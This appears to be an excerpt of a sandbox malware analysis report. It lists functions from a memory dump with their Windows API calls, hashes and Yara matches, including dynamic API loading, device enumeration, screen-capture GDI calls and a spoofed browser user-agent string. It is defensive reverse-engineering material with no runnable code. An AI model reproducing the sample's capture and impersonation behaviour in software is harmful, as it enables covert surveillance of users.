                                                                          Similarity
                                                                          • API ID: CurrentDebugDebuggerOutputPresentStringThread
                                                                          • String ID:
                                                                          • API String ID: 4268342597-0
                                                                          • Opcode ID: e54d7727b0b568634f449688ffaad1ea6b5d476df64d1ef47475528f31c8d79a
                                                                          • Instruction ID: 94cdd6a261ee305281beec90f226c43d4fd5c2e66e17ed20464f20e5604292d3
                                                                          • Opcode Fuzzy Hash: e54d7727b0b568634f449688ffaad1ea6b5d476df64d1ef47475528f31c8d79a
                                                                          • Instruction Fuzzy Hash: EE7188B0A087469FDBA0DF79C880B6A7BE5EF09300F0489ADE95AD7680E774E441DB51
                                                                          Function 06BBE2DC Relevance: .3, Instructions: 333COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2224fa48935fa0579447da8be0bb05dc86f12a205458aa432dda77d8c73a3090
                                                                          • Instruction ID: 37a2c8bfe374f189393f5833398ff49d509029d06f1ec947a8f332268360958f
                                                                          • Opcode Fuzzy Hash: 2224fa48935fa0579447da8be0bb05dc86f12a205458aa432dda77d8c73a3090
                                                                          • Instruction Fuzzy Hash: 0FC1CEF0900A068EDBB5CE68C8946FEBBB1EF05380F087699D552972B1D3B0E907CB51
                                                                          Function 06BBE63B Relevance: .3, Instructions: 328COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7e790f21015fde6a360fa9c65d37563a32b2491bc2c272def746492e7f7d4516
                                                                          • Instruction ID: f70ad1e7a75e186143278f21c9d57a073794e67e0e60d53f189aa8a771e762e6
                                                                          • Opcode Fuzzy Hash: 7e790f21015fde6a360fa9c65d37563a32b2491bc2c272def746492e7f7d4516
                                                                          • Instruction Fuzzy Hash: 5EB1E0B4E006068BCBE4CF79C9849FEBBB1EF44280B44369DC092A7261D6F1E907CB51
                                                                          Function 06BCF43E Relevance: .3, Instructions: 327COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1452528299-0
                                                                          • Opcode ID: 1bfc71a8812cb45ed3e0ec899defa2699f6a5f264d20eedf17c9262408459790
                                                                          • Instruction ID: d69770bf89adbde926362f72d002d6877d9849f5fb2f5a24a1e4ea9dc61a5910
                                                                          • Opcode Fuzzy Hash: 1bfc71a8812cb45ed3e0ec899defa2699f6a5f264d20eedf17c9262408459790
                                                                          • Instruction Fuzzy Hash: 8EB106B59107058BDBB89F34CC91AB7B3EEEF04328F1484EDDA86C6590EA75A745CB10
                                                                          Function 06BB2770 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 212libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RoGetActivationFactory.API-MS-WIN-CORE-WINRT-L1-1-0(?,00000001,5B885FF7,5B885FF7,?,00000000,00000044,?,?,?,?,?,?,06BD7EE0,000000FF), ref: 06BB27CB
                                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00001000,?,00000001,5B885FF7,5B885FF7,?,00000000,00000044,?,?,?,?,?,?), ref: 06BB27E6
                                                                          • GetProcAddress.KERNEL32(00000000,CoIncrementMTAUsage), ref: 06BB27F1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ActivationAddressFactoryLibraryLoadProc
                                                                          • String ID: CoIncrementMTAUsage$DllGetActivationFactory$combase.dll
                                                                          • API String ID: 935683589-2993125632
                                                                          • Opcode ID: 80fdd6f33f43bfee1e323c487da1e3e2acab18f849708c358ea0294d82fe7afb
                                                                          • Instruction ID: 7a6a2ec92f8824c03b45756f287d2493552f3bd0d57a699f1321a9ebbb2ea553
                                                                          • Opcode Fuzzy Hash: 80fdd6f33f43bfee1e323c487da1e3e2acab18f849708c358ea0294d82fe7afb
                                                                          • Instruction Fuzzy Hash: F2713EB1D00215ABDF95EFB4CC50BFDB7B8EF08310F0455A9E525A7290EBB0AA45CB60
                                                                          Function 06B7F630 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 228memorylibraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(?), ref: 06B7F8DF
                                                                          • GetProcAddress.KERNEL32(?,?), ref: 06B7F8F0
                                                                          • GetProcessHeap.KERNEL32 ref: 06B7F900
                                                                          • HeapAlloc.KERNEL32(00000000,00000000,?), ref: 06B7F926
                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 06B7F95A
                                                                          • HeapAlloc.KERNEL32(00000000,00000000,10000000), ref: 06B7F980
                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 06B7F99B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Heap$AllocFree$AddressHandleModuleProcProcess
                                                                          • String ID: C{iN$J'tq
                                                                          • API String ID: 685132064-1256937504
                                                                          • Opcode ID: 0141e7df317b0fa52aa68a1285a9ca3eb30ffbc12c7f12bdf2e0e853fc6d6060
                                                                          • Instruction ID: e964ceea3195c53c4f9aea191d283dab1f6b0a3016063d1866e24b2b92bb71f7
                                                                          • Opcode Fuzzy Hash: 0141e7df317b0fa52aa68a1285a9ca3eb30ffbc12c7f12bdf2e0e853fc6d6060
                                                                          • Instruction Fuzzy Hash: E3C1F2B4D04298DBDB26CFA8C841AEDFBB1BF58300F14829AD958BB355E7305A85CF51
                                                                          Function 06BB22F0 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 351threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 06BB22F5
                                                                            • Part of subcall function 06BB33BA: std::invalid_argument::invalid_argument.LIBCONCRT ref: 06BB33C6
                                                                          • GetCurrentThreadId.KERNEL32 ref: 06BB2466
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CurrentThreadXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                                                                          • String ID: vector too long
                                                                          • API String ID: 3461298183-2873823879
                                                                          • Opcode ID: a0283aabdfa0898ea38706450a8f99c05f1f648b1769f324c664754d1f01aef3
                                                                          • Instruction ID: cd84cc6aaa4d8a44d0de86b61448c0456cdabbf637ae3298c3ee2dc693898290
                                                                          • Opcode Fuzzy Hash: a0283aabdfa0898ea38706450a8f99c05f1f648b1769f324c664754d1f01aef3
                                                                          • Instruction Fuzzy Hash: 0ED16FB19042089FDB64DF64CC80BEAB7B9FF49304F0455DDE55997290EBB09A84CFA1
                                                                          Function 06B79590 Relevance: 13.7, APIs: 9, Instructions: 172memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LocalAlloc.KERNEL32(00000040,0000001C,06BE102C), ref: 06B795F0
                                                                          • SetupDiEnumDeviceInfo.SETUPAPI(00000000,06B799F4,00000000), ref: 06B7960E
                                                                          • LocalAlloc.KERNEL32(00000040,0000001C), ref: 06B79649
                                                                          • SetupDiEnumDeviceInterfaces.SETUPAPI(00000000,00000000,06BD9500,06B799F4,00000000), ref: 06B7966E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocDeviceEnumLocalSetup$InfoInterfaces
                                                                          • String ID:
                                                                          • API String ID: 1562706109-0
                                                                          • Opcode ID: 8d0d208175f97551f587a140853e5e1914ba6bbf21bbab4820ad03f550df69be
                                                                          • Instruction ID: 6a41c8db7f520401cefb8782836657118ab59c38e7ccdf9741bd229d70d780e7
                                                                          • Opcode Fuzzy Hash: 8d0d208175f97551f587a140853e5e1914ba6bbf21bbab4820ad03f550df69be
                                                                          • Instruction Fuzzy Hash: 4B71FAB4E01209EFDF44DFA4D895BEEBBB5FF48710F108158E525AB290D734AA01CBA4
                                                                          Function 06BB95C0 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • type_info::operator==.LIBVCRUNTIME ref: 06BB96DF
                                                                          • ___TypeMatch.LIBVCRUNTIME ref: 06BB97ED
                                                                          • _UnwindNestedFrames.LIBCMT ref: 06BB993F
                                                                          • CallUnexpected.LIBVCRUNTIME ref: 06BB995A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 2751267872-393685449
                                                                          • Opcode ID: 9e8ee87e9b01784ed93fe65e57ad9d2e09aa177c024dc14c367b9276e372794d
                                                                          • Instruction ID: af8ad50e3a4d52d72249215267f7e69ca6d14ff0c629c3045dc9fccb1d6594e4
                                                                          • Opcode Fuzzy Hash: 9e8ee87e9b01784ed93fe65e57ad9d2e09aa177c024dc14c367b9276e372794d
                                                                          • Instruction Fuzzy Hash: 67B15CB1C002099FCF95EFA4CC809FEBBB5FF06310B146599EA156B211D7B1DA51CB91
                                                                          Function 06B7D6B0 Relevance: 10.6, APIs: 7, Instructions: 86windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSystemMetrics.USER32(00000000), ref: 06B7D73C
                                                                          • GetSystemMetrics.USER32(00000001), ref: 06B7D74A
                                                                          • GetDC.USER32(00000000), ref: 06B7D758
                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 06B7D76B
                                                                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 06B7D789
                                                                          • SelectObject.GDI32(?,?), ref: 06B7D7A3
                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 06B7D7AF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CompatibleCreateMetricsSystem$BitmapObjectReleaseSelect
                                                                          • String ID:
                                                                          • API String ID: 1591331490-0
                                                                          • Opcode ID: 84c05e5f74b8cd0000be8a4c228650e04c30a5c3737341266acd144857eb977f
                                                                          • Instruction ID: 6ee970daed124e1f4a8185680f627a0297f347f608ec3375338ace08c2dadbad
                                                                          • Opcode Fuzzy Hash: 84c05e5f74b8cd0000be8a4c228650e04c30a5c3737341266acd144857eb977f
                                                                          • Instruction Fuzzy Hash: 1E4175B8A01208EFDB44DF94D594AADBBB5FF48304F208189E9059B381D771EE42DF90
                                                                          Function 06BB3454 Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 06BB345B
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 06BB3465
                                                                          • int.LIBCPMTD ref: 06BB347C
                                                                            • Part of subcall function 06B729D0: std::_Lockit::_Lockit.LIBCPMT ref: 06B729E6
                                                                            • Part of subcall function 06B729D0: std::_Lockit::~_Lockit.LIBCPMT ref: 06B72A10
                                                                          • codecvt.LIBCPMT ref: 06BB349F
                                                                          • std::_Facet_Register.LIBCPMT ref: 06BB34B6
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 06BB34D6
                                                                          • Concurrency::cancel_current_task.LIBCPMTD ref: 06BB34E3
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                          • String ID:
                                                                          • API String ID: 2133458128-0
                                                                          • Opcode ID: 34b229c1cbcf509339d8a4e67dd5310b7db1324554c1de01d7d2bcc58edb1823
                                                                          • Instruction ID: dbed319ab8fc6a2e549417808a65bebbfa141ff139c24b71626f584785b7f64e
                                                                          • Opcode Fuzzy Hash: 34b229c1cbcf509339d8a4e67dd5310b7db1324554c1de01d7d2bcc58edb1823
                                                                          • Instruction Fuzzy Hash: B11160F2A002149FCBD5BF74DC40AFEB7E5EB44220F145499D426AB381DFB1AA01CB91
                                                                          Function 06B7D430 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 140libraryloaderCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(?), ref: 06B7D612
                                                                          • GetProcAddress.KERNEL32(?,?), ref: 06B7D623
                                                                          • GetVersionExA.KERNEL32(06B9D388), ref: 06B7D645
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProcVersion
                                                                          • String ID: C}Fx$J'tq
                                                                          • API String ID: 3310240892-1733491810
                                                                          • Opcode ID: 710130bc8535aaccc587586eeb4d5ea5c4126a8404ce9b7cbf15d4c1c25fd326
                                                                          • Instruction ID: 8384ba4733d823c3986926123f12274b2782e49a87c328e4bc327c547506baec
                                                                          • Opcode Fuzzy Hash: 710130bc8535aaccc587586eeb4d5ea5c4126a8404ce9b7cbf15d4c1c25fd326
                                                                          • Instruction Fuzzy Hash: 9A712274D0929C9BDB16CFA8D8816DDFBB2BF59300F14829AD988B7306E7305A85CF51
                                                                          Function 06BC370A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,5B885FF7,?,?,00000000,06BD80D2,000000FF,?,06BC36A4,?,?,06BC3678,00000000), ref: 06BC373F
                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 06BC3751
                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,06BD80D2,000000FF,?,06BC36A4,?,?,06BC3678,00000000), ref: 06BC3773
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 4061214504-1276376045
                                                                          • Opcode ID: 9c4ef9de4b0b68b47b8d043907e79f508b9dfdbd4bc9351612b3cc444d1e6112
                                                                          • Instruction ID: 2839f15ebfcdfc47f17f7b332da9ff6ff92cc945638ca665f26e022fa8a0b44e
                                                                          • Opcode Fuzzy Hash: 9c4ef9de4b0b68b47b8d043907e79f508b9dfdbd4bc9351612b3cc444d1e6112
                                                                          • Instruction Fuzzy Hash: 1901D6F1941619EFCB51AF54DC19FAEBBBDFB04B15F004169F911A7290EB749A00CB80
                                                                          Function 06BA12B0 Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 06BA12D7
                                                                          • int.LIBCPMTD ref: 06BA12F0
                                                                            • Part of subcall function 06B729D0: std::_Lockit::_Lockit.LIBCPMT ref: 06B729E6
                                                                            • Part of subcall function 06B729D0: std::_Lockit::~_Lockit.LIBCPMT ref: 06B72A10
                                                                          • Concurrency::cancel_current_task.LIBCPMTD ref: 06BA1337
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 06BA13C2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                                          • String ID:
                                                                          • API String ID: 3053331623-0
                                                                          • Opcode ID: f2de501a148f462acb328999d8027ac823b5c798de02cbb7eff683125204aa71
                                                                          • Instruction ID: ba49987e6537867b734783f8a0f1eedead58c6b848476155f4f440c127904ab7
                                                                          • Opcode Fuzzy Hash: f2de501a148f462acb328999d8027ac823b5c798de02cbb7eff683125204aa71
                                                                          • Instruction Fuzzy Hash: 9A41D5B4D04209DFCB54DFA8D980AEEBBF5FF48310F108259E825A7390D7746A41CBA1
                                                                          Function 06BAD4B0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(kernelbase.dll), ref: 06BAD4B8
                                                                          • GetProcAddress.KERNEL32(00000000,RaiseFailFastException), ref: 06BAD4C4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: RaiseFailFastException$kernelbase.dll
                                                                          • API String ID: 1646373207-919018592
                                                                          • Opcode ID: 67be9679453dda09d426622255dacfe00e25ea1df7110a44af5e5ac4d450f643
                                                                          • Instruction ID: 68b0750765f96477201ec9c03e8546db5769ef666a8e04f94129ff609a2c17a4
                                                                          • Opcode Fuzzy Hash: 67be9679453dda09d426622255dacfe00e25ea1df7110a44af5e5ac4d450f643
                                                                          • Instruction Fuzzy Hash: 62C080F51C430897954077E5780DE26375DA600A513504095F501C6400DB61D010C661
                                                                          Function 06BBA701 Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateThread.KERNEL32(00000000,06B95AB0,06BBA5A3,00000000,00000004,00000000), ref: 06BBA750
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,06B9B23E,06B95AB0), ref: 06BBA75C
                                                                          • __dosmaperr.LIBCMT ref: 06BBA763
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateErrorLastThread__dosmaperr
                                                                          • String ID:
                                                                          • API String ID: 2744730728-0
                                                                          • Opcode ID: 6f80c62b9d5cf543712ed468742f0ce8bed524c4ab7e76570580ca181fa068fd
                                                                          • Instruction ID: d037b51f5def19597ece8f869f7023bbecfc4705adbc252fd33521b4a4ad04f6
                                                                          • Opcode Fuzzy Hash: 6f80c62b9d5cf543712ed468742f0ce8bed524c4ab7e76570580ca181fa068fd
                                                                          • Instruction Fuzzy Hash: 48018EB2D15214BBDB90AB69DC08BFEBA79DB81775F106295E524961D0DBF08500C760
                                                                          Function 06BA7700 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 129COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36, xrefs: 06BA782C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36
                                                                          • API String ID: 0-2732702261
                                                                          • Opcode ID: 9af5e615ddefc920804e802832d9287a66891031fcda436be4b49d211ab02376
                                                                          • Instruction ID: b990740f563b018f42bc5cc32949730c8a3a0a6e1fc066d4f0a4fa54749e1053
                                                                          • Opcode Fuzzy Hash: 9af5e615ddefc920804e802832d9287a66891031fcda436be4b49d211ab02376
                                                                          • Instruction Fuzzy Hash: 1051C2B5D04208AFDB48CFE9D894BEEBBB5EF48300F148169E519AB344DB746A41CF90
                                                                          Function 06B72760 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 06B72789
                                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 06B72855
                                                                            • Part of subcall function 06BB490D: _Yarn.LIBCPMT ref: 06BB492C
                                                                            • Part of subcall function 06BB490D: _Yarn.LIBCPMT ref: 06BB4950
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                          • String ID: bad locale name
                                                                          • API String ID: 1908188788-1405518554
                                                                          • Opcode ID: cb99a5dbf350849d538eb01f949ac426dce4524a143bc4f5f1c0be86f76d1e19
                                                                          • Instruction ID: c99d4cdfe89cb16bf23be57ea3c79e4008cb1bb04ec8b1e3464718542456e329
                                                                          • Opcode Fuzzy Hash: cb99a5dbf350849d538eb01f949ac426dce4524a143bc4f5f1c0be86f76d1e19
                                                                          • Instruction Fuzzy Hash: A34103B4D05289DFDB05CFA8C950BAEFBF1BF09304F148299D415AB382C7759A40CBA5
                                                                          Function 06BA75C0 Relevance: 5.1, APIs: 4, Instructions: 81memorystringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • lstrlenA.KERNEL32(00000000), ref: 06BA7676
                                                                          • GetProcessHeap.KERNEL32(00000008,-00000001), ref: 06BA7699
                                                                          • HeapAlloc.KERNEL32(00000000), ref: 06BA76A0
                                                                          • lstrcpynA.KERNEL32(00000000,00000000,00000000), ref: 06BA76B5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Heap$AllocProcesslstrcpynlstrlen
                                                                          • String ID:
                                                                          • API String ID: 2211197272-0
                                                                          • Opcode ID: 8cbc2e4ba37a73b1403a4760becd4208bfa6b20cb0a6b47454cd47895e1a1331
                                                                          • Instruction ID: c4771fe5bcbda961ed5b8374e9bd1307d7bead1cbbdcb7197c0353154568b7ba
                                                                          • Opcode Fuzzy Hash: 8cbc2e4ba37a73b1403a4760becd4208bfa6b20cb0a6b47454cd47895e1a1331
                                                                          • Instruction Fuzzy Hash: E8314AF5D05308EFDB44CFA8D954BAEBBB6FB44304F1085A8E915AB380D774AA40CB44